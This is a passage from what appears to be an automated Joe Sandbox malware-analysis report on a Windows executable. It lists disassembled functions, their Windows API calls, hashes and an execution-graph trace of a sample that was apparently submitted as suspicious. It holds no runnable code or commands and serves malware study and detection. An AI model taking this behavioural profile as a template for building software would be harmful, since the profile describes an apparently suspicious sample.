                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                              • String ID: le@
                                              • API String ID: 3248276644-3503961380
                                              • Opcode ID: fec7732a330a9e88aa59d831f20b6da9eee86d01c908d7265f8837d9fbe5c718
                                              • Instruction ID: e7db63e0e35e78dffee219aaf6f46514b8882a9137312b684398864940085c4f
                                              • Opcode Fuzzy Hash: fec7732a330a9e88aa59d831f20b6da9eee86d01c908d7265f8837d9fbe5c718
                                              • Instruction Fuzzy Hash: DF01F22219592159D622A73A1D88EAF2584CE86364717063FFC43B21D3DF3C896389BE
                                              Function 0040243C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,00002003,00000000), ref: 00402478
                                              • lstrcmpW.KERNEL32(?,?,?,00002003,00000000), ref: 00402483
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: PrivateProfileStringlstrcmp
                                              • String ID: !N~
                                              • API String ID: 623250636-529124213
                                              • Opcode ID: fc1006ea5aab162bbc40b6df3c94a123494fc128051bda68380e80ee4f4a212d
                                              • Instruction ID: 97e2760095c772b904354d470d60f9b26315119a41df21907abd1c807f0e2d98
                                              • Opcode Fuzzy Hash: fc1006ea5aab162bbc40b6df3c94a123494fc128051bda68380e80ee4f4a212d
                                              • Instruction Fuzzy Hash: 5CF01275900214ABDB00BFA8DD859AE3BBCAB08300B00412EF601F71A2D67449019B94
                                              Function 004056EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0045FDD0,Error launching installer), ref: 00405711
                                              • CloseHandle.KERNEL32(?), ref: 0040571E
                                              Strings
                                              • Error launching installer, xrefs: 004056F5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: CloseCreateHandleProcess
                                              • String ID: Error launching installer
                                              • API String ID: 3712363035-66219284
                                              • Opcode ID: 8a3581b750d29c0f06103fe1997c215cccf07df72e665a86a296c08cae4d825b
                                              • Instruction ID: 53ccf60803aa8836d7366e45e4d019fb0888d0b7e4ffe46943b31cf4c1d238f5
                                              • Opcode Fuzzy Hash: 8a3581b750d29c0f06103fe1997c215cccf07df72e665a86a296c08cae4d825b
                                              • Instruction Fuzzy Hash: A6E0EC70500209BBEB009B64EE49D7B7BBCEB44345F404436AD51E2151D774D81C9A69
                                              Function 00405864 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrlenA.KERNEL32(00406495,?,00000000,00000000,?,00000000,00406495,00000000,[Rename]), ref: 00405874
                                              • lstrcmpiA.KERNEL32(00000000,00406495), ref: 0040588C
                                              • CharNextA.USER32(00000000,?,00000000,00406495,00000000,[Rename]), ref: 0040589D
                                              • lstrlenA.KERNEL32(00000000,?,00000000,00406495,00000000,[Rename]), ref: 004058A6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: lstrlen$CharNextlstrcmpi
                                              • String ID:
                                              • API String ID: 190613189-0
                                              • Opcode ID: cd19360c238f1349a786dd8267181da6a2629ba8d2dc02acca249f0761a9dd09
                                              • Instruction ID: 678e37072a379e1faffe29b6aa71237c6b28e2b3d53614aa4618b887c013b5be
                                              • Opcode Fuzzy Hash: cd19360c238f1349a786dd8267181da6a2629ba8d2dc02acca249f0761a9dd09
                                              • Instruction Fuzzy Hash: 2CF0C236501448EFE701AFA5CD00C9F7BA8EF46350B2580BAEC40F7311D634DE019BA8

                                              Execution Graph

                                              Execution Coverage:3.9%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:2%
                                              Total number of Nodes:2000
                                              Total number of Limit Nodes:81
                                              execution_graph 97915 b31016 97920 b45ce7 97915->97920 97930 b50fe6 97920->97930 97922 b45cef 97923 b3101b 97922->97923 97940 b45f39 97922->97940 97927 b52f70 97923->97927 98030 b52e74 97927->98030 97929 b31025 97932 b50fee 97930->97932 97933 b51008 97932->97933 97935 b5100c std::exception::exception 97932->97935 97968 b5593c 97932->97968 97985 b535d1 DecodePointer 97932->97985 97933->97922 97986 b587cb RaiseException 97935->97986 97937 b51036 97987 b58701 58 API calls _free 97937->97987 97939 b51048 97939->97922 97941 b45cfb 97940->97941 97942 b45f42 97940->97942 97944 b45d13 97941->97944 97943 b52f70 __cinit 67 API calls 97942->97943 97943->97941 97996 b41207 97944->97996 97948 b45d6e 97957 b45d9b 97948->97957 98014 b41981 97948->98014 97950 b45d8f 98018 b4133d 97950->98018 97952 b45e00 GetCurrentProcess IsWow64Process 97953 b45e19 97952->97953 97955 b45e2f 97953->97955 97956 b45e98 GetSystemInfo 97953->97956 97954 b81098 98010 b455f0 97955->98010 97958 b45e65 97956->97958 97957->97952 97957->97954 97958->97923 97961 b45e41 97963 b455f0 2 API calls 97961->97963 97962 b45e8c GetSystemInfo 97964 b45e56 97962->97964 97965 b45e49 GetNativeSystemInfo 97963->97965 97964->97958 97966 b45e5c FreeLibrary 97964->97966 97965->97964 97966->97958 97969 b559b7 97968->97969 97974 b55948 97968->97974 97994 b535d1 DecodePointer 97969->97994 97971 b55953 97971->97974 97988 b5a39b 58 API calls 2 library calls 97971->97988 97989 b5a3f8 58 API calls 7 library calls 97971->97989 97990 b532cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97971->97990 97972 b559bd 97995 b58d58 58 API calls __getptd_noexit 97972->97995 97974->97971 97976 b5597b RtlAllocateHeap 97974->97976 97979 b559a3 97974->97979 97983 b559a1 97974->97983 97991 b535d1 DecodePointer 97974->97991 97976->97974 97977 b559af 97976->97977 97977->97932 97992 b58d58 58 API calls __getptd_noexit 97979->97992 97993 b58d58 58 API calls __getptd_noexit 97983->97993 97985->97932 97986->97937 97987->97939 97988->97971 97989->97971 97991->97974 97992->97983 97993->97977 97994->97972 97995->97977 97997 b50fe6 Mailbox 59 API calls 97996->97997 97998 b41228 97997->97998 97999 b50fe6 Mailbox 59 API calls 97998->97999 98000 b41236 GetVersionExW 97999->98000 98001 b41821 98000->98001 98002 b4182d __wsetenvp 98001->98002 98003 b4189a 98001->98003 98005 b41843 98002->98005 98006 b41868 98002->98006 98004 b41981 59 API calls 98003->98004 98009 b4184b _memmove 98004->98009 98022 b41b7c 59 API calls Mailbox 98005->98022 98023 b41c7e 98006->98023 98009->97948 98011 b45619 98010->98011 98012 b455f9 LoadLibraryA 98010->98012 98011->97961 98011->97962 98012->98011 98013 b4560a GetProcAddress 98012->98013 98013->98011 98015 b4198f 98014->98015 98017 b41998 _memmove 98014->98017 98015->98017 98026 b41aa4 98015->98026 98017->97950 98019 b4134b 98018->98019 98020 b41981 59 API calls 98019->98020 98021 b4135b 98020->98021 98021->97957 98022->98009 98024 b50fe6 Mailbox 59 API calls 98023->98024 98025 b41c88 98024->98025 98025->98009 98027 b41ab7 98026->98027 98029 b41ab4 _memmove 98026->98029 98028 b50fe6 Mailbox 59 API calls 98027->98028 98028->98029 98029->98017 98031 b52e80 __getstream 98030->98031 98038 b53447 98031->98038 98037 b52ea7 __getstream 98037->97929 98055 b59e3b 98038->98055 98040 b52e89 98041 b52eb8 DecodePointer DecodePointer 98040->98041 98042 b52ee5 98041->98042 98043 b52e95 98041->98043 98042->98043 98101 b589d4 59 API calls 2 library calls 98042->98101 98052 b52eb2 98043->98052 98045 b52f48 EncodePointer EncodePointer 98045->98043 98046 b52ef7 98046->98045 98047 b52f1c 98046->98047 98102 b58a94 61 API calls __realloc_crt 98046->98102 98047->98043 98050 b52f36 EncodePointer 98047->98050 98103 b58a94 61 API calls __realloc_crt 98047->98103 98050->98045 98051 b52f30 98051->98043 98051->98050 98104 b53450 98052->98104 98056 b59e4c 98055->98056 98057 b59e5f EnterCriticalSection 98055->98057 98062 b59ec3 98056->98062 98057->98040 98059 b59e52 98059->98057 98086 b532e5 58 API calls 3 library calls 98059->98086 98063 b59ecf __getstream 98062->98063 98064 b59ef0 98063->98064 98065 b59ed8 98063->98065 98078 b59f11 __getstream 98064->98078 98090 b58a4d 58 API calls 2 library calls 98064->98090 98087 b5a39b 58 API calls 2 library calls 98065->98087 98068 b59edd 98088 b5a3f8 58 API calls 7 library calls 98068->98088 98069 b59f05 98072 b59f0c 98069->98072 98073 b59f1b 98069->98073 98071 b59ee4 98089 b532cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98071->98089 98091 b58d58 58 API calls __getptd_noexit 98072->98091 98076 b59e3b __lock 58 API calls 98073->98076 98079 b59f22 98076->98079 98078->98059 98080 b59f47 98079->98080 98081 b59f2f 98079->98081 98093 b52f85 98080->98093 98092 b5a05b InitializeCriticalSectionAndSpinCount 98081->98092 98084 b59f3b 98099 b59f63 LeaveCriticalSection _doexit 98084->98099 98087->98068 98088->98071 98090->98069 98091->98078 98092->98084 98094 b52f8e RtlFreeHeap 98093->98094 98095 b52fb7 _free 98093->98095 98094->98095 98096 b52fa3 98094->98096 98095->98084 98100 b58d58 58 API calls __getptd_noexit 98096->98100 98098 b52fa9 GetLastError 98098->98095 98099->98078 98100->98098 98101->98046 98102->98047 98103->98051 98107 b59fa5 LeaveCriticalSection 98104->98107 98106 b52eb7 98106->98037 98107->98106 98108 b31055 98113 b32a19 98108->98113 98111 b52f70 __cinit 67 API calls 98112 b31064 98111->98112 98114 b41207 59 API calls 98113->98114 98115 b32a87 98114->98115 98120 b31256 98115->98120 98118 b32b24 98119 b3105a 98118->98119 98123 b313f8 59 API calls 2 library calls 98118->98123 98119->98111 98124 b31284 98120->98124 98123->98118 98125 b31275 98124->98125 98126 b31291 98124->98126 98125->98118 98126->98125 98127 b31298 RegOpenKeyExW 98126->98127 98127->98125 98128 b312b2 RegQueryValueExW 98127->98128 98129 b312e8 RegCloseKey 98128->98129 98130 b312d3 98128->98130 98129->98125 98130->98129 98131 b35ff5 98145 b35ede Mailbox _memmove 98131->98145 98132 b50fe6 59 API calls Mailbox 98132->98145 98133 b36a9b 98416 b3a9de 299 API calls 98133->98416 98136 b6eff9 98436 b35190 59 API calls Mailbox 98136->98436 98137 b36abc 98434 b9a48d 89 API calls 4 library calls 98137->98434 98139 b6f007 98437 b9a48d 89 API calls 4 library calls 98139->98437 98141 b6efeb 98189 b35569 Mailbox 98141->98189 98435 b86cf1 59 API calls Mailbox 98141->98435 98144 b360e5 98144->98137 98146 b6e137 98144->98146 98147 b363bd Mailbox 98144->98147 98172 b36152 Mailbox 98144->98172 98145->98132 98145->98133 98145->98136 98145->98137 98145->98139 98145->98144 98145->98189 98201 b353b0 98145->98201 98372 bac355 98145->98372 98415 b3523c 59 API calls 98145->98415 98420 b41c9c 98145->98420 98424 b97f11 59 API calls Mailbox 98145->98424 98425 b41a36 98145->98425 98429 b86cf1 59 API calls Mailbox 98145->98429 98146->98147 98417 b87aad 59 API calls 98146->98417 98152 b50fe6 Mailbox 59 API calls 98147->98152 98160 b36426 98147->98160 98155 b363d1 98152->98155 98155->98137 98156 b363de 98155->98156 98158 b36413 98156->98158 98159 b6e172 98156->98159 98158->98160 98188 b35447 Mailbox 98158->98188 98418 bac87c 85 API calls 2 library calls 98159->98418 98419 bac9c9 95 API calls Mailbox 98160->98419 98164 b6e19d 98164->98164 98165 b50fe6 59 API calls Mailbox 98165->98188 98167 b6f165 98439 b9a48d 89 API calls 4 library calls 98167->98439 98168 b6e691 98431 b9a48d 89 API calls 4 library calls 98168->98431 98171 b369fa 98179 b41c9c 59 API calls 98171->98179 98172->98137 98172->98141 98178 b6e2e9 VariantClear 98172->98178 98172->98189 98229 b3cfd7 98172->98229 98248 b9412a 98172->98248 98251 b3d679 98172->98251 98291 b9d6be 98172->98291 98336 bae60c 98172->98336 98339 b9413a 98172->98339 98342 baf1b2 98172->98342 98347 ba5e1d 98172->98347 98414 b35190 59 API calls Mailbox 98172->98414 98430 b87aad 59 API calls 98172->98430 98174 b6e6a0 98175 b369ff 98175->98167 98175->98168 98176 b6ea9a 98182 b41c9c 59 API calls 98176->98182 98178->98172 98179->98189 98180 b41c9c 59 API calls 98180->98188 98182->98189 98183 b41207 59 API calls 98183->98188 98184 b6eb67 98184->98189 98432 b87aad 59 API calls 98184->98432 98185 b87aad 59 API calls 98185->98188 98186 b52f70 67 API calls __cinit 98186->98188 98188->98165 98188->98168 98188->98171 98188->98175 98188->98176 98188->98180 98188->98183 98188->98184 98188->98185 98188->98186 98188->98189 98190 b6ef28 98188->98190 98192 b35a1a 98188->98192 98412 b37e50 299 API calls 2 library calls 98188->98412 98413 b36e30 60 API calls Mailbox 98188->98413 98433 b9a48d 89 API calls 4 library calls 98190->98433 98438 b9a48d 89 API calls 4 library calls 98192->98438 98202 b353cf 98201->98202 98223 b353fd Mailbox 98201->98223 98203 b50fe6 Mailbox 59 API calls 98202->98203 98203->98223 98204 b369fa 98205 b41c9c 59 API calls 98204->98205 98225 b35569 Mailbox 98205->98225 98206 b87aad 59 API calls 98206->98223 98207 b369ff 98209 b6f165 98207->98209 98210 b6e691 98207->98210 98208 b50fe6 59 API calls Mailbox 98208->98223 98446 b9a48d 89 API calls 4 library calls 98209->98446 98442 b9a48d 89 API calls 4 library calls 98210->98442 98214 b52f70 67 API calls __cinit 98214->98223 98215 b6e6a0 98215->98145 98216 b41c9c 59 API calls 98216->98223 98217 b6ea9a 98221 b41c9c 59 API calls 98217->98221 98219 b41207 59 API calls 98219->98223 98221->98225 98222 b6eb67 98222->98225 98443 b87aad 59 API calls 98222->98443 98223->98204 98223->98206 98223->98207 98223->98208 98223->98210 98223->98214 98223->98216 98223->98217 98223->98219 98223->98222 98223->98225 98226 b6ef28 98223->98226 98228 b35a1a 98223->98228 98440 b37e50 299 API calls 2 library calls 98223->98440 98441 b36e30 60 API calls Mailbox 98223->98441 98225->98145 98444 b9a48d 89 API calls 4 library calls 98226->98444 98445 b9a48d 89 API calls 4 library calls 98228->98445 98447 b34d37 98229->98447 98233 b3d018 98234 b3d57b 98233->98234 98237 b3d439 Mailbox __wsetenvp 98233->98237 98495 b3502b 98233->98495 98234->98172 98237->98234 98239 b50c65 62 API calls 98237->98239 98240 b34f98 59 API calls 98237->98240 98243 b34d37 84 API calls 98237->98243 98244 b3502b 59 API calls 98237->98244 98245 b41821 59 API calls 98237->98245 98470 b5312d 98237->98470 98480 b459d3 98237->98480 98491 b45ac3 98237->98491 98499 b4162d 98237->98499 98504 b4153b 59 API calls 2 library calls 98237->98504 98505 b34f3c 59 API calls Mailbox 98237->98505 98239->98237 98240->98237 98243->98237 98244->98237 98245->98237 98577 b9494a GetFileAttributesW 98248->98577 98581 b34f98 98251->98581 98255 b50fe6 Mailbox 59 API calls 98256 b3d6aa 98255->98256 98259 b3d6ba 98256->98259 98611 b43df7 60 API calls Mailbox 98256->98611 98257 b3d6df 98263 b3502b 59 API calls 98257->98263 98267 b3d6ec 98257->98267 98258 b75068 98258->98257 98631 b9fbb7 59 API calls 98258->98631 98261 b34d37 84 API calls 98259->98261 98262 b3d6c8 98261->98262 98612 b43e47 98262->98612 98265 b750b0 98263->98265 98265->98267 98268 b750b8 98265->98268 98594 b441d6 98267->98594 98270 b3502b 59 API calls 98268->98270 98272 b3d6f3 98270->98272 98273 b750ca 98272->98273 98274 b3d70d 98272->98274 98275 b50fe6 Mailbox 59 API calls 98273->98275 98276 b41207 59 API calls 98274->98276 98277 b750d0 98275->98277 98278 b3d715 98276->98278 98279 b750e4 98277->98279 98599 b43ea1 98277->98599 98623 b43b7b 65 API calls Mailbox 98278->98623 98285 b750e8 _memmove 98279->98285 98602 b97c7f 98279->98602 98281 b3d724 98281->98285 98624 b34f3c 59 API calls Mailbox 98281->98624 98286 b3d738 Mailbox 98287 b3d772 98286->98287 98625 b442cf 98286->98625 98287->98172 98292 b9d6dd 98291->98292 98293 b9d6e8 98291->98293 98294 b3502b 59 API calls 98292->98294 98295 b9d7c2 Mailbox 98293->98295 98298 b41207 59 API calls 98293->98298 98294->98293 98296 b50fe6 Mailbox 59 API calls 98295->98296 98332 b9d7cb Mailbox 98295->98332 98297 b9d80b 98296->98297 98299 b9d817 98297->98299 98741 b43df7 60 API calls Mailbox 98297->98741 98300 b9d70c 98298->98300 98303 b34d37 84 API calls 98299->98303 98302 b41207 59 API calls 98300->98302 98304 b9d715 98302->98304 98305 b9d82f 98303->98305 98306 b34d37 84 API calls 98304->98306 98307 b43e47 67 API calls 98305->98307 98308 b9d721 98306->98308 98309 b9d83e 98307->98309 98678 b50119 98308->98678 98311 b9d842 GetLastError 98309->98311 98312 b9d876 98309->98312 98314 b9d85b 98311->98314 98316 b9d8d8 98312->98316 98317 b9d8a1 98312->98317 98313 b9d736 98315 b417e0 59 API calls 98313->98315 98314->98332 98742 b43f0b FindCloseChangeNotification 98314->98742 98318 b9d769 98315->98318 98319 b50fe6 Mailbox 59 API calls 98316->98319 98320 b50fe6 Mailbox 59 API calls 98317->98320 98321 b9412a 3 API calls 98318->98321 98335 b9d793 Mailbox 98318->98335 98322 b9d8dd 98319->98322 98323 b9d8a6 98320->98323 98326 b9d779 98321->98326 98328 b41207 59 API calls 98322->98328 98322->98332 98327 b9d8b7 98323->98327 98329 b41207 59 API calls 98323->98329 98324 b3502b 59 API calls 98324->98295 98331 b41a36 59 API calls 98326->98331 98326->98335 98743 b9fc0d 59 API calls 2 library calls 98327->98743 98328->98332 98329->98327 98333 b9d78a 98331->98333 98332->98172 98729 b93f1d 98333->98729 98335->98324 98762 bad1c6 98336->98762 98338 bae61c 98338->98172 98340 b9494a 3 API calls 98339->98340 98341 b9413f 98340->98341 98341->98172 98343 b34d37 84 API calls 98342->98343 98344 baf1cf 98343->98344 98879 b94148 CreateToolhelp32Snapshot Process32FirstW 98344->98879 98346 baf1de 98346->98172 98348 ba5e46 98347->98348 98349 ba5e74 WSAStartup 98348->98349 98350 b3502b 59 API calls 98348->98350 98351 ba5e9d 98349->98351 98361 ba5e88 Mailbox 98349->98361 98352 ba5e61 98350->98352 98900 b440cd 98351->98900 98352->98349 98356 b3502b 59 API calls 98352->98356 98355 b34d37 84 API calls 98357 ba5eb2 98355->98357 98358 ba5e70 98356->98358 98905 b4402a WideCharToMultiByte 98357->98905 98358->98349 98360 ba5ebf inet_addr gethostbyname 98360->98361 98362 ba5edd IcmpCreateFile 98360->98362 98361->98172 98362->98361 98363 ba5f01 98362->98363 98364 b50fe6 Mailbox 59 API calls 98363->98364 98365 ba5f1a 98364->98365 98913 b4433f 98365->98913 98368 ba5f34 IcmpSendEcho 98370 ba5f6d 98368->98370 98369 ba5f55 IcmpSendEcho 98369->98370 98371 ba5fd4 IcmpCloseHandle WSACleanup 98370->98371 98371->98361 98373 bac39a 98372->98373 98374 bac380 98372->98374 98918 baa8fd 98373->98918 98945 b9a48d 89 API calls 4 library calls 98374->98945 98378 b353b0 298 API calls 98379 bac406 98378->98379 98380 bac392 Mailbox 98379->98380 98381 bac498 98379->98381 98385 bac447 98379->98385 98380->98145 98382 bac4ee 98381->98382 98383 bac49e 98381->98383 98382->98380 98384 b34d37 84 API calls 98382->98384 98946 b97ed5 59 API calls 98383->98946 98386 bac500 98384->98386 98390 b9789a 59 API calls 98385->98390 98388 b41aa4 59 API calls 98386->98388 98391 bac524 CharUpperBuffW 98388->98391 98389 bac4c1 98947 b435b9 59 API calls Mailbox 98389->98947 98393 bac477 98390->98393 98396 bac53e 98391->98396 98395 b86ebc 298 API calls 98393->98395 98394 bac4c9 Mailbox 98948 b3b020 98394->98948 98395->98380 98397 bac591 98396->98397 98398 bac545 98396->98398 98399 b34d37 84 API calls 98397->98399 98925 b9789a 98398->98925 98401 bac599 98399->98401 98990 b35376 60 API calls 98401->98990 98406 bac5a3 98406->98380 98407 b34d37 84 API calls 98406->98407 98408 bac5be 98407->98408 98991 b435b9 59 API calls Mailbox 98408->98991 98410 bac5ce 98411 b3b020 298 API calls 98410->98411 98411->98380 98412->98188 98413->98188 98414->98172 98415->98145 98416->98137 98417->98147 98418->98160 98419->98164 98421 b41ca7 98420->98421 98422 b41caf 98420->98422 99531 b41bcc 59 API calls 2 library calls 98421->99531 98422->98145 98424->98145 98426 b41a45 __wsetenvp _memmove 98425->98426 98427 b50fe6 Mailbox 59 API calls 98426->98427 98428 b41a83 98427->98428 98428->98145 98429->98145 98430->98172 98431->98174 98432->98189 98433->98192 98434->98141 98435->98189 98436->98141 98437->98141 98438->98189 98439->98189 98440->98223 98441->98223 98442->98215 98443->98225 98444->98228 98445->98225 98446->98225 98448 b34d51 98447->98448 98456 b34d4b 98447->98456 98449 b6db28 __i64tow 98448->98449 98450 b34d99 98448->98450 98451 b34d57 __itow 98448->98451 98455 b6da2f 98448->98455 98506 b538c8 83 API calls 4 library calls 98450->98506 98454 b50fe6 Mailbox 59 API calls 98451->98454 98457 b34d71 98454->98457 98458 b50fe6 Mailbox 59 API calls 98455->98458 98463 b6daa7 Mailbox _wcscpy 98455->98463 98465 b35278 98456->98465 98457->98456 98459 b41a36 59 API calls 98457->98459 98460 b6da74 98458->98460 98459->98456 98461 b50fe6 Mailbox 59 API calls 98460->98461 98462 b6da9a 98461->98462 98462->98463 98464 b41a36 59 API calls 98462->98464 98507 b538c8 83 API calls 4 library calls 98463->98507 98464->98463 98466 b50fe6 Mailbox 59 API calls 98465->98466 98467 b35285 98466->98467 98468 b35294 98467->98468 98469 b41a36 59 API calls 98467->98469 98468->98233 98469->98468 98471 b531ae 98470->98471 98473 b53139 98470->98473 98510 b531c0 60 API calls 4 library calls 98471->98510 98479 b5315e 98473->98479 98508 b58d58 58 API calls __getptd_noexit 98473->98508 98475 b531bb 98475->98237 98476 b53145 98509 b58fe6 9 API calls _fseek 98476->98509 98478 b53150 98478->98237 98479->98237 98481 b459fe _memset 98480->98481 98511 b45800 98481->98511 98484 b45a83 98486 b45a9d Shell_NotifyIconW 98484->98486 98487 b45ab9 Shell_NotifyIconW 98484->98487 98488 b45aab 98486->98488 98487->98488 98515 b456f8 98488->98515 98490 b45ab2 98490->98237 98492 b45b25 98491->98492 98493 b45ad5 _memset 98491->98493 98492->98237 98494 b45af4 Shell_NotifyIconW 98493->98494 98494->98492 98496 b35041 98495->98496 98497 b3503c 98495->98497 98496->98237 98497->98496 98576 b537ba 59 API calls 98497->98576 98500 b50fe6 Mailbox 59 API calls 98499->98500 98501 b41652 98500->98501 98502 b50fe6 Mailbox 59 API calls 98501->98502 98503 b41660 98502->98503 98503->98237 98504->98237 98505->98237 98506->98451 98507->98449 98508->98476 98509->98478 98510->98475 98512 b45810 98511->98512 98513 b4581c 98511->98513 98512->98484 98545 b934dd 62 API calls _W_store_winword 98512->98545 98513->98512 98514 b45821 DestroyIcon 98513->98514 98514->98512 98516 b45715 98515->98516 98517 b457fa Mailbox 98515->98517 98518 b4162d 59 API calls 98516->98518 98517->98490 98519 b45723 98518->98519 98520 b80c4c LoadStringW 98519->98520 98521 b45730 98519->98521 98524 b80c66 98520->98524 98522 b41821 59 API calls 98521->98522 98523 b45745 98522->98523 98525 b45752 98523->98525 98532 b80c74 98523->98532 98526 b41c9c 59 API calls 98524->98526 98525->98524 98527 b45760 98525->98527 98533 b45778 _memset _wcscpy 98526->98533 98546 b41900 98527->98546 98531 b80cb7 Mailbox 98563 b538c8 83 API calls 4 library calls 98531->98563 98532->98531 98532->98533 98534 b41207 59 API calls 98532->98534 98535 b457e0 Shell_NotifyIconW 98533->98535 98536 b80c9e 98534->98536 98535->98517 98562 b90252 60 API calls Mailbox 98536->98562 98539 b80ca9 98541 b417e0 59 API calls 98539->98541 98540 b80cd6 98542 b41900 59 API calls 98540->98542 98541->98531 98543 b80ce7 98542->98543 98544 b41900 59 API calls 98543->98544 98544->98533 98545->98484 98547 b41914 98546->98547 98548 b7f534 98546->98548 98564 b418a5 98547->98564 98550 b41c7e 59 API calls 98548->98550 98552 b7f53f __wsetenvp _memmove 98550->98552 98551 b4191f 98553 b417e0 98551->98553 98554 b7f401 98553->98554 98555 b417f2 98553->98555 98575 b887f9 59 API calls _memmove 98554->98575 98569 b41680 98555->98569 98558 b417fe 98558->98533 98559 b7f40b 98560 b41c9c 59 API calls 98559->98560 98561 b7f413 Mailbox 98560->98561 98562->98539 98563->98540 98565 b418b4 __wsetenvp 98564->98565 98566 b41c7e 59 API calls 98565->98566 98567 b418c5 _memmove 98565->98567 98568 b7f4f1 _memmove 98566->98568 98567->98551 98570 b41692 98569->98570 98574 b416ba _memmove 98569->98574 98571 b50fe6 Mailbox 59 API calls 98570->98571 98570->98574 98573 b4176f _memmove 98571->98573 98572 b50fe6 Mailbox 59 API calls 98572->98573 98573->98572 98574->98558 98575->98559 98576->98496 98578 b94131 98577->98578 98579 b94965 FindFirstFileW 98577->98579 98578->98172 98579->98578 98580 b9497a FindClose 98579->98580 98580->98578 98582 b34fa8 98581->98582 98583 b6dd2b 98581->98583 98587 b50fe6 Mailbox 59 API calls 98582->98587 98584 b6dd3c 98583->98584 98585 b41821 59 API calls 98583->98585 98632 b419e1 98584->98632 98585->98584 98588 b34fbb 98587->98588 98589 b6dd46 98588->98589 98591 b34fc6 98588->98591 98590 b34fd4 98589->98590 98592 b41207 59 API calls 98589->98592 98590->98255 98590->98258 98591->98590 98593 b41a36 59 API calls 98591->98593 98592->98590 98593->98590 98636 b4410a 98594->98636 98597 b4410a 2 API calls 98598 b4420b 98597->98598 98598->98272 98646 b44220 98599->98646 98603 b97c8a 98602->98603 98604 b50fe6 Mailbox 59 API calls 98603->98604 98605 b97c91 98604->98605 98606 b97c9d 98605->98606 98607 b97cbe 98605->98607 98609 b50fe6 Mailbox 59 API calls 98606->98609 98608 b50fe6 Mailbox 59 API calls 98607->98608 98610 b97ca6 _memset 98608->98610 98609->98610 98610->98285 98611->98259 98613 b442cf FindCloseChangeNotification 98612->98613 98614 b43e53 98613->98614 98653 b442f9 98614->98653 98616 b43e72 98620 b3d6d7 98616->98620 98661 b43c61 62 API calls Mailbox 98616->98661 98618 b43e84 98662 b4389f 98618->98662 98620->98257 98620->98258 98630 b43f0b FindCloseChangeNotification 